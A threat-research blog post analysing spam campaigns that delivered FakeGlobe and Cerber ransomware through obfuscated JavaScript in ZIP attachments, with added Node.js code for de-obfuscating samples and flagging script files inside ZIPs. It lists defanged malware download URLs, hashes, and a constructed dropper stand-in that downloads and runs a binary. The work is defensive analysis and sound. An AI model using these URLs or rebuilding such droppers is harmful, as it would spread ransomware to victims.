SpiderLabs Blog

FakeGlobe and Cerber Ransomware: Sneaking under the radar while WeCry

Recently, we observed a steady influx of spam distributing two ransomware families, perhaps trying to sneak in while everyone is focused on the recent WannaCry malware. Based on data from our Spam Research Database, an email campaign distributing FakeGlobe ransomware started on May 19 and died down on May 21. Just a couple of hours later it was Cerber's turn, and that campaign subsided three days later.


Figure 1: Volume of FakeGlobe and Cerber related Spam.

The Cerber family emerged during the first quarter of 2016 and has been distributed via the Neutrino and Magnitude exploit kits as well as spam emails carrying VBScript files. FakeGlobe samples were first seen in the last quarter of 2016, also via malicious spam, and are considered closely related to the Globe ransomware family.

This is not a massive campaign, but we did see almost 31,000 spam emails in our system distributing the two families. While we don't know which botnet sent this spam, the majority of it originates from Vietnam, India, and Laos. This merely indicates where the compromised sending machines are located, not who is behind the campaign.


Figure 2: FakeGlobe and Cerber Spam Origin.

Infection Vector

The spam related to FakeGlobe and Cerber comes with a ZIP attachment, a blank Subject line and no email body at all.


Figure 3: Sample Email

For FakeGlobe, the ZIP extracts to an obfuscated JS file, and we saw two variations. As shown in the figure below, the first variation is encoded with the Microsoft Script Encoder, which is easy to recognize by its unique delimiters (#@~^ at the start of the encoded block and ^#~@ at the end). Tools to decode this encoding are publicly available.


Figure 4: MS Encoded Script – FakeGlobe

The second variation stores the real code as a string with junk delimiters inserted, reassembles it with split() and join(), and passes the result to eval().


Figure 5: Obfuscated Script – FakeGlobe

A classic way to de-obfuscate such code is to replace the eval() call with document.write, so that the decoded string is written into the document instead of being executed. Do this only in an isolated analysis VM: everything in the script other than that one eval() still runs.


Figure 6: Handling the Obfuscated Script – FakeGlobe

Decoding either script yields plain JavaScript that downloads a binary, saves it under a filename consisting of a random string of digits, and executes it.


Figure 7: Decoded/De-obfuscated Script for FakeGlobe
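The following is an added example, not code from the SpiderLabs post, showing how the two FakeGlobe variants above can be triaged in Node.js. classify() separates the Script Encoder variant from the eval()/split()/join() variant by the markers described above, and unwrapEval() recovers the decoded stage of the second variant without a browser: the script is run with eval and document.write bound to a recording function, so the decoded string is captured rather than executed (the same idea as the document.write trick). The obfuscated sample is constructed here with obfuscate(); real samples use the same split()/join() pattern but are far longer, and the download()/run() names and the example.invalid URL in the stand-in payload are placeholders, not from the real sample.

```javascript
// Added example (not from the SpiderLabs post). The sample below is constructed;
// example.invalid, download() and run() are placeholders and are never called.

const SCRENC_OPEN = '#@~^';   // Microsoft Script Encoder start marker
const SCRENC_CLOSE = '^#~@';  // Microsoft Script Encoder end marker

// Tell the two FakeGlobe JS variants apart by their static markers.
function classify(src) {
  if (src.includes(SCRENC_OPEN) && src.includes(SCRENC_CLOSE)) return 'ms-script-encoder';
  if (/\beval\s*\(/.test(src) && /\.split\s*\(/.test(src) && /\.join\s*\(/.test(src)) {
    return 'eval-split-join';
  }
  return 'unknown';
}

// Constructed stand-in for the decoded dropper stage (download URL, random
// numeric filename, execute). Recovered as text only, never executed.
const PLAIN = [
  "var url = 'hxxp://example.invalid/admin.php?f=1';",
  "var name = String(Math.floor(Math.random() * 1e9)) + '.exe';",
  'download(url, name);',
  'run(name);',
].join('\n');

// One layer of the split()/join() obfuscation used by the second variant:
// every character is separated by a junk delimiter and reassembled inside eval().
function obfuscate(code, delim) {
  const padded = code.split('').join(delim);
  return 'eval(' + JSON.stringify(padded) + '.split(' + JSON.stringify(delim) + ').join(""));';
}

// Run `code` with eval and document.write shadowed by a recorder. A call to eval()
// whose callee is not the built-in eval is an ordinary function call, so the
// argument (the decoded next stage) is captured and nothing in it is executed.
function captureEval(code) {
  const captured = [];
  const sink = (s) => { captured.push(String(s)); };
  try {
    new Function('eval', 'document', 'WScript', 'ActiveXObject', code)(
      sink, { write: sink }, undefined, undefined);
  } catch (e) {
    // Anything the sample tries after the capture (ActiveX, WScript) fails here; expected.
  }
  return captured;
}

// Peel nested layers until a stage no longer hands anything to eval()/document.write.
function unwrapEval(code, maxLayers = 8) {
  let stage = code;
  for (let i = 0; i < maxLayers; i++) {
    const next = captureEval(stage);
    if (next.length === 0) return stage;
    stage = next.join('\n');
  }
  throw new Error('more than ' + maxLayers + ' eval layers');
}

// Two nested layers, as a real sample might have.
const SAMPLE = obfuscate(obfuscate(PLAIN, '#'), '|');

console.log(classify(SAMPLE));
console.log(unwrapEval(SAMPLE));
```

This only neutralizes eval() and document.write; the sample's other statements do run inside new Function, so keep this in a throwaway VM like the document.write approach. A sample that detects a missing WScript object before decoding would need those names stubbed rather than left undefined.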

Download URLs (FakeGlobe):

hxxp://realpolyfv.top/admin.php?f=404

hxxp://realpolyfv.top/admin.php?f=1

hxxp://justgoogkaz.top/admin.php?f=404

Hash Details (FakeGlobe):

MD5: 1BBD2DC9746292C60121865663B287F2

SHA-1: 04644335EF7523274146A4F39AB30621C2A2A9A1

SHA-256: 2815C8CDB02003298F7959FD1CF6EED893DE6652F3861A6A2E3E5744B8AC9234

For the Cerber variant, the ZIP holds only an obfuscated JS file; decoding it reveals a script of the same kind that downloads a different binary.


Figure 8: De-obfuscated Script for Cerber

Download URLs (Cerber):

hxxp://zopoaheika.top/admin.php?f=1

Hash Details (Cerber):

MD5: AE5A348B9DD0AC3A6A46E70C82FA9C38

SHA-1: F440EDC4FE35452D0FBEC35A5C352295F3E3BF0C

SHA-256: 73A7497C8FA283B444242259AE061D5CBB705BE04B5F531F1096A2C236BB5204

Executable Payload

The binaries of both FakeGlobe and Cerber behave the same as their previous variants, encrypting the victim's files, with only minor changes to the ransom note. Cerber now uses a different filename for its note, _R_E_A_D___T_H_I_S___{random}.html or _R_E_A_D___T_H_I_S___{random}.txt. The note's contents are unchanged apart from the payment URLs.


Figure 9: Cerber's Ransom Note

FakeGlobe still drops how_to_back_files.html, but the email address to which victims are told to send a screenshot of their Bitcoin payment has changed.


Conclusion

While everyone is riding the WeCry/WannaCry wave and focused on patching the SMB server vulnerabilities, FakeGlobe and Cerber continue their low-profile attacks via email. Each of these emails carries a unique attachment because the obfuscated JavaScript differs from message to message, so blocking on attachment hashes alone is not enough. By the time the script downloads the main ransomware, it is too late, so the attachment should be stopped at the email gateway.

  • Use an email gateway with multiple layers of protection, including anti-spam and anti-malware layers with up-to-date signatures
  • At a policy level, consider blocking inbound *.js files at the email gateway, including *.js files inside ZIP attachments, since we are currently seeing many malicious email campaigns that use them
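The following is an added example, not code from the SpiderLabs post or from any gateway product, of the kind of check the second recommendation implies. Since the .js in this campaign arrives inside a ZIP, a filter on the attachment's own extension is not enough; the check below reads the ZIP central directory and flags script members (.js, .jse, .wsf, .wsh, .vbs, .vbe, .hta), without decompressing or running anything. The ZIPs are built inline (stored, uncompressed) so the example runs offline; the member names, contents and attachment filenames are constructed.

```javascript
// Added example (not from the SpiderLabs post or any gateway). ZIP samples below
// are constructed; member names such as 7304918.js mimic the campaign's random
// numeric filenames but are made up.

const SCRIPT_EXT = /\.(js|jse|wsf|wsh|vbs|vbe|hta)$/i;

// --- constructed sample builder: minimal stored ZIP from {name, data} entries ---
function crc32(buf) {
  let c = 0xffffffff;
  for (const b of buf) {
    c ^= b;
    for (let k = 0; k < 8; k++) c = (c >>> 1) ^ (0xedb88320 & -(c & 1));
  }
  return (c ^ 0xffffffff) >>> 0;
}

function buildStoredZip(entries) {
  const parts = [], central = [];
  let offset = 0;
  for (const { name, data } of entries) {
    const nameBuf = Buffer.from(name, 'utf8');
    const dataBuf = Buffer.from(data, 'utf8');
    const crc = crc32(dataBuf);
    const lfh = Buffer.alloc(30);          // local file header; zeroed fields = flags 0, method stored
    lfh.writeUInt32LE(0x04034b50, 0);
    lfh.writeUInt16LE(20, 4);              // version needed
    lfh.writeUInt32LE(crc, 14);
    lfh.writeUInt32LE(dataBuf.length, 18); // compressed size (== uncompressed when stored)
    lfh.writeUInt32LE(dataBuf.length, 22);
    lfh.writeUInt16LE(nameBuf.length, 26);
    const cdh = Buffer.alloc(46);          // central directory header
    cdh.writeUInt32LE(0x02014b50, 0);
    cdh.writeUInt16LE(20, 4);              // version made by
    cdh.writeUInt16LE(20, 6);              // version needed
    cdh.writeUInt32LE(crc, 16);
    cdh.writeUInt32LE(dataBuf.length, 20);
    cdh.writeUInt32LE(dataBuf.length, 24);
    cdh.writeUInt16LE(nameBuf.length, 28);
    cdh.writeUInt32LE(offset, 42);         // offset of this entry's local header
    parts.push(lfh, nameBuf, dataBuf);
    central.push(cdh, nameBuf);
    offset += 30 + nameBuf.length + dataBuf.length;
  }
  const cd = Buffer.concat(central);
  const eocd = Buffer.alloc(22);           // end of central directory record
  eocd.writeUInt32LE(0x06054b50, 0);
  eocd.writeUInt16LE(entries.length, 8);
  eocd.writeUInt16LE(entries.length, 10);
  eocd.writeUInt32LE(cd.length, 12);
  eocd.writeUInt32LE(offset, 16);          // central directory starts after all local entries
  return Buffer.concat([...parts, cd, eocd]);
}

// --- the check: walk the central directory and return member names ---
function zipMemberNames(buf) {
  if (buf.length < 22) throw new Error('too short to be a ZIP');
  // The EOCD record is in the last 22 + 65535 bytes (a trailing comment may follow it).
  let eocd = -1;
  for (let i = buf.length - 22; i >= Math.max(0, buf.length - 22 - 65535); i--) {
    if (buf.readUInt32LE(i) === 0x06054b50) { eocd = i; break; }
  }
  if (eocd < 0) throw new Error('not a ZIP: no end-of-central-directory record');
  const count = buf.readUInt16LE(eocd + 10);
  let off = buf.readUInt32LE(eocd + 16);
  const names = [];
  for (let n = 0; n < count; n++) {
    if (off + 46 > buf.length || buf.readUInt32LE(off) !== 0x02014b50) {
      throw new Error('corrupt central directory');
    }
    const nameLen = buf.readUInt16LE(off + 28);
    const extraLen = buf.readUInt16LE(off + 30);
    const commentLen = buf.readUInt16LE(off + 32);
    names.push(buf.toString('utf8', off + 46, off + 46 + nameLen));
    off += 46 + nameLen + extraLen + commentLen;
  }
  return names;
}

function scriptMembers(zipBuf) {
  return zipMemberNames(zipBuf).filter((n) => SCRIPT_EXT.test(n));
}

// Gateway-style verdict for one message's attachments: [{ filename, bytes }].
// Bare script attachments and scripts inside ZIP attachments both count.
function shouldBlock(attachments) {
  const hits = [];
  for (const a of attachments) {
    if (/\.zip$/i.test(a.filename)) {
      for (const m of scriptMembers(a.bytes)) hits.push(a.filename + ':' + m);
    } else if (SCRIPT_EXT.test(a.filename)) {
      hits.push(a.filename);
    }
  }
  return { block: hits.length > 0, hits };
}

const MALICIOUS_ZIP = buildStoredZip([{ name: '7304918.js', data: 'eval("...")' }]);
const BENIGN_ZIP = buildStoredZip([
  { name: 'report.pdf', data: '%PDF-1.4' },
  { name: 'notes.txt', data: 'nothing to see' },
]);

console.log(shouldBlock([{ filename: 'scan.zip', bytes: MALICIOUS_ZIP }]));
console.log(shouldBlock([{ filename: 'report.zip', bytes: BENIGN_ZIP }]));
```

The decision is made from member names alone, so a ZIP nested inside another ZIP, or a RAR/7z container, passes this check; a production gateway recurses into archives and ideally also sniffs member content rather than trusting extensions.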

The Trustwave Secure Email Gateway recognizes and blocks this threat campaign.
